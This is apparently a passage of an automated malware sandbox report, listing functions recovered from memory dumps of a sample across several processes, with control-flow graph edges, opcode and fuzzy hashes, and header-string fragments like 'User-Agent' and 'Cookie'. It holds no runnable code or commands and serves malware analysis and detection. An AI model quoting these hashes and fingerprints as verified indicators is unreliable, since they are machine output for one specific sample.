                                                                                                                                                                • Instruction Fuzzy Hash: 534163B6500218BFEF129F65CC44BDEBBBAEF84708F154069EA44AA295D7309640CF94
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                Executed Functions

                                                                                                                                                                Function 02D1093E Relevance: .1, Instructions: 134COMMON
                                                                                                                                                                Download Yara Rule

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                • Executed
                                                                                                                                                                • Not Executed
                                                                                                                                                                control_flow_graph 0 2d1093e-2d1095f call 2d10cc4 call 2d114bc call 2d13cc0 8 2d10967-2d10989 0->8 10 2d10af1-2d10af2 8->10 11 2d1098f-2d109d2 call 2d109d9 8->11 15 2d109d4-2d109d5 11->15 16 2d10a3d-2d10a76 11->16 18 2d109d7-2d109e8 call 2d13653 15->18 19 2d10a3c 15->19 17 2d10a7e-2d10a80 16->17 21 2d10a82-2d10aae 17->21 22 2d10aec call 2d10af3 17->22 18->22 30 2d109ee-2d10a10 18->30 19->16 21->22 27 2d10ab0-2d10abc 21->27 22->10 31 2d10ac1-2d10ae5 27->31 30->22 33 2d10a16-2d10a3b 30->33 31->10 37 2d10ae7-2d10aea 31->37 33->22 38 2d10a41-2d10a76 33->38 37->22 37->31 38->17
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000002B.00000002.2928152474.0000000002D10000.00000040.00000001.00020000.00000000.sdmp, Offset: 02D10000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_43_2_2d10000_BjCNEZCMnwLaEEzWr.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID:
                                                                                                                                                                • Opcode ID: 0e1f2a4e7413688aa54805ed2a14ac9b83cd4127bce701e40c3c8803db53eeff
                                                                                                                                                                • Instruction ID: c291d25784932bde87530bc4f36875857955563f895ee08658809ebf7c2dd5d4
                                                                                                                                                                • Opcode Fuzzy Hash: 0e1f2a4e7413688aa54805ed2a14ac9b83cd4127bce701e40c3c8803db53eeff
                                                                                                                                                                • Instruction Fuzzy Hash: 4051A131544254AFEB126F20CC85B9977BCEF04744F0401D9BE49FE1D6DBB09990CB65
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                Function 02D114BC Relevance: .1, Instructions: 68COMMON
                                                                                                                                                                Download Yara Rule

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                • Executed
                                                                                                                                                                • Not Executed
                                                                                                                                                                control_flow_graph 39 2d114bc-2d11590 call 2d114de call 2d10c9c call 2d11345 * 6
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000002B.00000002.2928152474.0000000002D10000.00000040.00000001.00020000.00000000.sdmp, Offset: 02D10000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_43_2_2d10000_BjCNEZCMnwLaEEzWr.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID:
                                                                                                                                                                • Opcode ID: 4e691a712de486e4dfceb288b4c3d9d3fe3d652e5e2e3b2f50e0e601de67137e
                                                                                                                                                                • Instruction ID: bdbbdbe7ee3422e6b911ce8c13495133de3afa4bc1e10ea329a01af182c3128d
                                                                                                                                                                • Opcode Fuzzy Hash: 4e691a712de486e4dfceb288b4c3d9d3fe3d652e5e2e3b2f50e0e601de67137e
                                                                                                                                                                • Instruction Fuzzy Hash: 1C21EB72404624AEDF03AE60D9C98A673ECEF40704F45056A9AC9EE84DEA709554CEF6
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                Function 02D11345 Relevance: .1, Instructions: 61COMMON
                                                                                                                                                                Download Yara Rule

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                • Executed
                                                                                                                                                                • Not Executed
                                                                                                                                                                control_flow_graph 58 2d11345-2d11352 59 2d11358-2d1135e 58->59 60 2d113eb-2d113ec 58->60 59->60 61 2d11364-2d1137a 59->61 61->60 63 2d1137c-2d1138f 61->63 65 2d11391-2d11398 63->65 66 2d1139b-2d113ab call 2d10e7c 65->66 69 2d113ad-2d113e2 66->69 69->60
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000002B.00000002.2928152474.0000000002D10000.00000040.00000001.00020000.00000000.sdmp, Offset: 02D10000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_43_2_2d10000_BjCNEZCMnwLaEEzWr.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID:
                                                                                                                                                                • Opcode ID: e6710b313372bdb89baaa3f3abf609e97fcf4defd94341f28ea73213f73bc76a
                                                                                                                                                                • Instruction ID: 42a8cbecb83fba90c64b92e03ec103fd091d5b7cbd75cdeba92887049836a4b6
                                                                                                                                                                • Opcode Fuzzy Hash: e6710b313372bdb89baaa3f3abf609e97fcf4defd94341f28ea73213f73bc76a
                                                                                                                                                                • Instruction Fuzzy Hash: B821903190421AAFDF119F78D844B5DBBB5AF04704F054215FE59BB694D770EC10CBA4
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                Function 02D114DE Relevance: .1, Instructions: 51COMMON
                                                                                                                                                                Download Yara Rule

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                • Executed
                                                                                                                                                                • Not Executed
                                                                                                                                                                control_flow_graph 70 2d114de-2d11590 call 2d13653 call 2d10c9c call 2d11345 * 6
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000002B.00000002.2928152474.0000000002D10000.00000040.00000001.00020000.00000000.sdmp, Offset: 02D10000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_43_2_2d10000_BjCNEZCMnwLaEEzWr.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID:
                                                                                                                                                                • Opcode ID: d4917235bce67b0bd341cc4376806be672fb8739d92a651c71d1172738683fcb
                                                                                                                                                                • Instruction ID: 45425d857fc1ac77a2ea22a20cb75dff3cd0deeb5e61607b68ce90c64a9b931e
                                                                                                                                                                • Opcode Fuzzy Hash: d4917235bce67b0bd341cc4376806be672fb8739d92a651c71d1172738683fcb
                                                                                                                                                                • Instruction Fuzzy Hash: 23119C72404624AEEF03AF60D5C88AA73ECEE40704F45096A9DC9EE94DFE709554CEF5
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                Function 02D13F0D Relevance: .0, Instructions: 26COMMON
                                                                                                                                                                Download Yara Rule

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                • Executed
                                                                                                                                                                • Not Executed
                                                                                                                                                                control_flow_graph 88 2d13f0d-2d13f29 call 2d13653 call 2d1379f 93 2d13f3b-2d13f66 call 2d13f78 * 3 88->93 94 2d13f2b-2d13f39 call 2d1401b 88->94 107 2d13f71 93->107 102 2d13f76-2d13f77 94->102 107->102 108 2d13f71 call 2d13f78 107->108 108->102
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000002B.00000002.2928152474.0000000002D10000.00000040.00000001.00020000.00000000.sdmp, Offset: 02D10000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_43_2_2d10000_BjCNEZCMnwLaEEzWr.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID:
                                                                                                                                                                • Opcode ID: 550d547703b1faf33bdbb28134adf901e3b34dfa1c128e3e0b52710aeb13400a
                                                                                                                                                                • Instruction ID: 3fcb4d742b1b3f3c5c9cc23a7051bc898e758c0b646f7eaa17a9df3c62c14d1a
                                                                                                                                                                • Opcode Fuzzy Hash: 550d547703b1faf33bdbb28134adf901e3b34dfa1c128e3e0b52710aeb13400a
                                                                                                                                                                • Instruction Fuzzy Hash: 8AF01C70588280BAEF803BB0AC496593AB9EF40745F0405D1EA89ADAD4DE70CD50CE75
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                Non-executed Functions

                                                                                                                                                                Function 02D14675 Relevance: 6.4, Strings: 5, Instructions: 128COMMON
                                                                                                                                                                Download Yara Rule

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                • Executed
                                                                                                                                                                • Not Executed
                                                                                                                                                                control_flow_graph 134 2d14675-2d1468d call 2d13a1c 137 2d1469d-2d146cd 134->137 138 2d1468f-2d14698 call 2d13a6e 134->138 141 2d146d3-2d146f5 137->141 142 2d147e7-2d147ec 137->142 138->137 141->142 144 2d146fb-2d14720 141->144 146 2d14722-2d14737 144->146 147 2d14738-2d1475a 144->147 146->147 149 2d1475c-2d1477e 147->149 150 2d147bf-2d147c9 147->150 149->150 155 2d14780-2d147a2 149->155 151 2d147e0-2d147e5 150->151 152 2d147cb-2d147dd call 2d13673 150->152 151->142 152->151 155->150 158 2d147a4-2d147bc 155->158 158->150
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000002B.00000002.2928152474.0000000002D10000.00000040.00000001.00020000.00000000.sdmp, Offset: 02D10000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_43_2_2d10000_BjCNEZCMnwLaEEzWr.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID: -Age$Cook$User$ie: $nt:
                                                                                                                                                                • API String ID: 0-2052191038
                                                                                                                                                                • Opcode ID: 21bbdfff56fab31c03729283b2ea7a1e7782b6cd8000812816065b0b8d19ca46
                                                                                                                                                                • Instruction ID: 586c58786fc7952d8bfccb014d5adc37d988225db7fd8c545908abadc321fbd6
                                                                                                                                                                • Opcode Fuzzy Hash: 21bbdfff56fab31c03729283b2ea7a1e7782b6cd8000812816065b0b8d19ca46
                                                                                                                                                                • Instruction Fuzzy Hash: 214163B6500208BFEF125F65CC48BDEBFBAEF84704F154069EA44AA254DB34DA50CF94
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                Function 02D14674 Relevance: 6.4, Strings: 5, Instructions: 128COMMON
                                                                                                                                                                Download Yara Rule

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                • Executed
                                                                                                                                                                • Not Executed
                                                                                                                                                                control_flow_graph 109 2d14674-2d14680 110 2d1468b-2d1468d 109->110 111 2d14686 call 2d13a1c 109->111 112 2d1469d-2d146cd 110->112 113 2d1468f-2d14698 call 2d13a6e 110->113 111->110 116 2d146d3-2d146f5 112->116 117 2d147e7-2d147ec 112->117 113->112 116->117 119 2d146fb-2d14720 116->119 121 2d14722-2d14737 119->121 122 2d14738-2d1475a 119->122 121->122 124 2d1475c-2d1477e 122->124 125 2d147bf-2d147c9 122->125 124->125 130 2d14780-2d147a2 124->130 126 2d147e0-2d147e5 125->126 127 2d147cb-2d147dd call 2d13673 125->127 126->117 127->126 130->125 133 2d147a4-2d147bc 130->133 133->125
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000002B.00000002.2928152474.0000000002D10000.00000040.00000001.00020000.00000000.sdmp, Offset: 02D10000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_43_2_2d10000_BjCNEZCMnwLaEEzWr.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID: -Age$Cook$User$ie: $nt:
                                                                                                                                                                • API String ID: 0-2052191038
                                                                                                                                                                • Opcode ID: 2b93bd9568e5da8988b8e1df8da560840dd12be90571bd433eb3dce17dfd8eb8
                                                                                                                                                                • Instruction ID: 7f7f1518c5a39c8ac1effdf6bebe13be69549d9033eca76c7cd4e97308580cd6
                                                                                                                                                                • Opcode Fuzzy Hash: 2b93bd9568e5da8988b8e1df8da560840dd12be90571bd433eb3dce17dfd8eb8
                                                                                                                                                                • Instruction Fuzzy Hash: B54151B6500208BFEF129F65CC44BEEBBBAEF84704F154069EA44AA654DB34DA50CF94
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                Executed Functions

                                                                                                                                                                Function 02B4093E Relevance: .1, Instructions: 134COMMON
                                                                                                                                                                Download Yara Rule

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                • Executed
                                                                                                                                                                • Not Executed
                                                                                                                                                                control_flow_graph 0 2b4093e-2b4095f call 2b40cc4 call 2b414bc call 2b43cc0 8 2b40967-2b40989 0->8 10 2b40af1-2b40af2 8->10 11 2b4098f-2b409d2 call 2b409d9 8->11 15 2b409d4-2b409d5 11->15 16 2b40a3d-2b40a76 11->16 17 2b409d7-2b409e8 call 2b43653 15->17 18 2b40a3c 15->18 19 2b40a7e-2b40a80 16->19 22 2b40aec call 2b40af3 17->22 30 2b409ee-2b40a10 17->30 18->16 21 2b40a82-2b40aae 19->21 19->22 21->22 27 2b40ab0-2b40abc 21->27 22->10 31 2b40ac1-2b40ae5 27->31 30->22 34 2b40a16-2b40a3b 30->34 31->10 37 2b40ae7-2b40aea 31->37 34->22 38 2b40a41-2b40a76 34->38 37->22 37->31 38->19
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000002C.00000002.2917716069.0000000002B40000.00000040.00000001.00020000.00000000.sdmp, Offset: 02B40000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_44_2_2b40000_BjCNEZCMnwLaEEzWr.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID:
                                                                                                                                                                • Opcode ID: 0e1f2a4e7413688aa54805ed2a14ac9b83cd4127bce701e40c3c8803db53eeff
                                                                                                                                                                • Instruction ID: 7e044f5b8e72692e244d1030433adc8e2aa4c3f7b632016452dca4f6a6114004
                                                                                                                                                                • Opcode Fuzzy Hash: 0e1f2a4e7413688aa54805ed2a14ac9b83cd4127bce701e40c3c8803db53eeff
                                                                                                                                                                • Instruction Fuzzy Hash: 4251C231544254AFEB166F20CCC4B9937B8EF04744F0805DABB49FE0D6DBB09690DE65
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                Function 02B414BC Relevance: .1, Instructions: 68COMMON
                                                                                                                                                                Download Yara Rule

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                • Executed
                                                                                                                                                                • Not Executed
                                                                                                                                                                control_flow_graph 39 2b414bc-2b414df call 2b414de 42 2b414e1-2b41500 call 2b40c9c 39->42 43 2b41502-2b41590 call 2b41345 * 6 39->43 42->43
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000002C.00000002.2917716069.0000000002B40000.00000040.00000001.00020000.00000000.sdmp, Offset: 02B40000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_44_2_2b40000_BjCNEZCMnwLaEEzWr.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID:
                                                                                                                                                                • Opcode ID: fc032be1761e2e27ec16aa6f47ae36ec6219fc5cd5c4500d68a6f7b1eca660e1
                                                                                                                                                                • Instruction ID: 5a1db5da38009b4faac20ec537b88844c6220a4acacaff59dac035c4ea7d9ced
                                                                                                                                                                • Opcode Fuzzy Hash: fc032be1761e2e27ec16aa6f47ae36ec6219fc5cd5c4500d68a6f7b1eca660e1
                                                                                                                                                                • Instruction Fuzzy Hash: 6B210372404614AEDF03AF60C9C8CA673ECEF40704F4545AA9D89EF049FE709194CEE5
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                Function 02B41345 Relevance: .1, Instructions: 61COMMON
                                                                                                                                                                Download Yara Rule

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                • Executed
                                                                                                                                                                • Not Executed
                                                                                                                                                                control_flow_graph 59 2b41345-2b41352 60 2b41358-2b4135e 59->60 61 2b413eb-2b413ec 59->61 60->61 62 2b41364-2b4137a 60->62 62->61 64 2b4137c-2b4138f 62->64 66 2b41391-2b41398 64->66 67 2b4139b-2b413ab call 2b40e7c 66->67 70 2b413ad-2b413e2 67->70 70->61
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000002C.00000002.2917716069.0000000002B40000.00000040.00000001.00020000.00000000.sdmp, Offset: 02B40000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_44_2_2b40000_BjCNEZCMnwLaEEzWr.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID:
                                                                                                                                                                • Opcode ID: e6710b313372bdb89baaa3f3abf609e97fcf4defd94341f28ea73213f73bc76a
                                                                                                                                                                • Instruction ID: 006ca92935070087b3e51781ca23028249746b330ef9acacb628a55b8ae5542c
                                                                                                                                                                • Opcode Fuzzy Hash: e6710b313372bdb89baaa3f3abf609e97fcf4defd94341f28ea73213f73bc76a
                                                                                                                                                                • Instruction Fuzzy Hash: 00218E31914216AFDF11DE78C884B5DBBB5AF04704F058255F959BB594DB70A810CB94
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                Function 02B414DE Relevance: .1, Instructions: 51COMMON
                                                                                                                                                                Download Yara Rule

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                • Executed
                                                                                                                                                                • Not Executed
                                                                                                                                                                control_flow_graph 71 2b414de-2b41590 call 2b43653 call 2b40c9c call 2b41345 * 6
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000002C.00000002.2917716069.0000000002B40000.00000040.00000001.00020000.00000000.sdmp, Offset: 02B40000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_44_2_2b40000_BjCNEZCMnwLaEEzWr.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID:
                                                                                                                                                                • Opcode ID: 2fe8e250536a2cc792e0f46b2e11c914316ba17fdb804fdedba9ee654a488dd4
                                                                                                                                                                • Instruction ID: 61c70a9494ed1f47b44357f7deea25f8a1c9f9047ae98bc3093b8fce9cdb6375
                                                                                                                                                                • Opcode Fuzzy Hash: 2fe8e250536a2cc792e0f46b2e11c914316ba17fdb804fdedba9ee654a488dd4
                                                                                                                                                                • Instruction Fuzzy Hash: 22119172404524AEEF03AF64C5C8CAA73ECEF40708B4549AA9D89EF44DFE709154DEE5
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                Function 02B43F0D Relevance: .0, Instructions: 26COMMON
                                                                                                                                                                Download Yara Rule

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                • Executed
                                                                                                                                                                • Not Executed
                                                                                                                                                                control_flow_graph 90 2b43f0d-2b43f29 call 2b43653 call 2b4379f 95 2b43f3b-2b43f66 call 2b43f78 * 3 90->95 96 2b43f2b-2b43f39 call 2b4401b 90->96 109 2b43f71 95->109 104 2b43f76-2b43f77 96->104 109->104 110 2b43f71 call 2b43f78 109->110 110->104
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000002C.00000002.2917716069.0000000002B40000.00000040.00000001.00020000.00000000.sdmp, Offset: 02B40000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_44_2_2b40000_BjCNEZCMnwLaEEzWr.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID:
                                                                                                                                                                • Opcode ID: 3c9cd30d46be4e823d3ee55b0dac37f33b61cd8768b05aa00de7007601ee8eb1
                                                                                                                                                                • Instruction ID: 28286c3b24bf8dbfe327efdae5fce7ff4dbc62d4e8e0cf2f7a1cdd47cca444f1
                                                                                                                                                                • Opcode Fuzzy Hash: 3c9cd30d46be4e823d3ee55b0dac37f33b61cd8768b05aa00de7007601ee8eb1
                                                                                                                                                                • Instruction Fuzzy Hash: B5F01C70598240ABFF403BB09CC9B5D36F9AF40705F5C06D1AAC9AD0D4DF709550AE75
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                Non-executed Functions

                                                                                                                                                                Function 02B44674 Relevance: 6.4, Strings: 5, Instructions: 128COMMON
                                                                                                                                                                Download Yara Rule

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                • Executed
                                                                                                                                                                • Not Executed
                                                                                                                                                                control_flow_graph 111 2b44674-2b4468d call 2b43a1c 114 2b4469d-2b446cd 111->114 115 2b4468f-2b44698 call 2b43a6e 111->115 118 2b447e7-2b447ec 114->118 119 2b446d3-2b446f5 114->119 115->114 119->118 121 2b446fb-2b44720 119->121 123 2b44722-2b44737 121->123 124 2b44738-2b4475a 121->124 123->124 126 2b4475c-2b4477e 124->126 127 2b447bf-2b447c9 124->127 126->127 133 2b44780-2b447a2 126->133 128 2b447e0-2b447e5 127->128 129 2b447cb-2b447dd call 2b43673 127->129 128->118 129->128 133->127 135 2b447a4-2b447bc 133->135 135->127
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000002C.00000002.2917716069.0000000002B40000.00000040.00000001.00020000.00000000.sdmp, Offset: 02B40000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_44_2_2b40000_BjCNEZCMnwLaEEzWr.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID: -Age$Cook$User$ie: $nt:
                                                                                                                                                                • API String ID: 0-2052191038
                                                                                                                                                                • Opcode ID: 2b93bd9568e5da8988b8e1df8da560840dd12be90571bd433eb3dce17dfd8eb8
                                                                                                                                                                • Instruction ID: 2cfa0e6135a3bea1cd0a71246f168e574437954a962a14d99c8944f1d1204081
                                                                                                                                                                • Opcode Fuzzy Hash: 2b93bd9568e5da8988b8e1df8da560840dd12be90571bd433eb3dce17dfd8eb8
                                                                                                                                                                • Instruction Fuzzy Hash: 894184B6500208BFEF125F65CC84BDEBBBAEF80704F154099EA44AA254DB70D550DF94
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                Function 02B44675 Relevance: 6.4, Strings: 5, Instructions: 128COMMON
                                                                                                                                                                Download Yara Rule

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                • Executed
                                                                                                                                                                • Not Executed
                                                                                                                                                                control_flow_graph 136 2b44675-2b44680 137 2b4468b-2b4468d 136->137 138 2b44686 call 2b43a1c 136->138 139 2b4469d-2b446cd 137->139 140 2b4468f-2b44698 call 2b43a6e 137->140 138->137 143 2b447e7-2b447ec 139->143 144 2b446d3-2b446f5 139->144 140->139 144->143 146 2b446fb-2b44720 144->146 148 2b44722-2b44737 146->148 149 2b44738-2b4475a 146->149 148->149 151 2b4475c-2b4477e 149->151 152 2b447bf-2b447c9 149->152 151->152 158 2b44780-2b447a2 151->158 153 2b447e0-2b447e5 152->153 154 2b447cb-2b447dd call 2b43673 152->154 153->143 154->153 158->152 160 2b447a4-2b447bc 158->160 160->152
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000002C.00000002.2917716069.0000000002B40000.00000040.00000001.00020000.00000000.sdmp, Offset: 02B40000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_44_2_2b40000_BjCNEZCMnwLaEEzWr.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID: -Age$Cook$User$ie: $nt:
                                                                                                                                                                • API String ID: 0-2052191038
                                                                                                                                                                • Opcode ID: 21bbdfff56fab31c03729283b2ea7a1e7782b6cd8000812816065b0b8d19ca46
                                                                                                                                                                • Instruction ID: c7108e884a482c4e1609bd50166dcbff1599dadbf38bbaed23f69403cea2667d
                                                                                                                                                                • Opcode Fuzzy Hash: 21bbdfff56fab31c03729283b2ea7a1e7782b6cd8000812816065b0b8d19ca46
                                                                                                                                                                • Instruction Fuzzy Hash: 514174B6500208BFEF125F65CC88FDEBFBAEF80704F1540A9EA44AA254DB74D650DB94
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                Executed Functions

                                                                                                                                                                Function 02E2093E Relevance: .1, Instructions: 134COMMON
                                                                                                                                                                Download Yara Rule

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                • Executed
                                                                                                                                                                • Not Executed
                                                                                                                                                                control_flow_graph 0 2e2093e-2e2095f call 2e20cc4 call 2e214bc call 2e23cc0 8 2e20967-2e20989 0->8 10 2e20af1-2e20af2 8->10 11 2e2098f-2e209d2 call 2e209d9 8->11 15 2e209d4-2e209d5 11->15 16 2e20a3d-2e20a76 11->16 18 2e209d7-2e209e8 call 2e23653 15->18 19 2e20a3c 15->19 17 2e20a7e-2e20a80 16->17 21 2e20a82-2e20aae 17->21 22 2e20aec call 2e20af3 17->22 18->22 30 2e209ee-2e20a10 18->30 19->16 21->22 27 2e20ab0-2e20abc 21->27 22->10 31 2e20ac1-2e20ae5 27->31 30->22 34 2e20a16-2e20a3b 30->34 31->10 37 2e20ae7-2e20aea 31->37 34->22 38 2e20a41-2e20a76 34->38 37->22 37->31 38->17
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000002D.00000002.2922419078.0000000002E20000.00000040.00000001.00020000.00000000.sdmp, Offset: 02E20000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_45_2_2e20000_BjCNEZCMnwLaEEzWr.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID:
                                                                                                                                                                • Opcode ID: 0e1f2a4e7413688aa54805ed2a14ac9b83cd4127bce701e40c3c8803db53eeff
                                                                                                                                                                • Instruction ID: 11c20fb4ef809aca2e07b82b85ba9d3a16434bcba7781fa5fb5457c143d3ab6b
                                                                                                                                                                • Opcode Fuzzy Hash: 0e1f2a4e7413688aa54805ed2a14ac9b83cd4127bce701e40c3c8803db53eeff
                                                                                                                                                                • Instruction Fuzzy Hash: 6951C2715842649FEF139F20CC85B9937BCAF04744F4401D9BA4AFE0D6DBB09694CE65
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                Function 02E214BC Relevance: .1, Instructions: 68COMMON
                                                                                                                                                                Download Yara Rule

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                • Executed
                                                                                                                                                                • Not Executed
                                                                                                                                                                control_flow_graph 39 2e214bc-2e21590 call 2e214de call 2e20c9c call 2e21345 * 6
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000002D.00000002.2922419078.0000000002E20000.00000040.00000001.00020000.00000000.sdmp, Offset: 02E20000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_45_2_2e20000_BjCNEZCMnwLaEEzWr.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID:
                                                                                                                                                                • Opcode ID: c8359f379aab296cf034102068ae67c8d17d9b0a7435fec540ab5f7bd7715324
                                                                                                                                                                • Instruction ID: c02eaa029a4605bf7dd9fe6e6b63335bff78f416f52c36445e429f6d15c77f50
                                                                                                                                                                • Opcode Fuzzy Hash: c8359f379aab296cf034102068ae67c8d17d9b0a7435fec540ab5f7bd7715324
                                                                                                                                                                • Instruction Fuzzy Hash: 832101724046249EDF03AF60C9C9CA673EDEF40704F45456AAD8AEF049FE709258CEE6
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                Function 02E21345 Relevance: .1, Instructions: 61COMMON
                                                                                                                                                                Download Yara Rule

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                • Executed
                                                                                                                                                                • Not Executed
                                                                                                                                                                control_flow_graph 58 2e21345-2e21352 59 2e213eb-2e213ec 58->59 60 2e21358-2e2135e 58->60 60->59 61 2e21364-2e2137a 60->61 61->59 63 2e2137c-2e2138f 61->63 65 2e21391-2e21398 63->65 66 2e2139b-2e213ab call 2e20e7c 65->66 69 2e213ad-2e213e2 66->69 69->59
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000002D.00000002.2922419078.0000000002E20000.00000040.00000001.00020000.00000000.sdmp, Offset: 02E20000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_45_2_2e20000_BjCNEZCMnwLaEEzWr.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID:
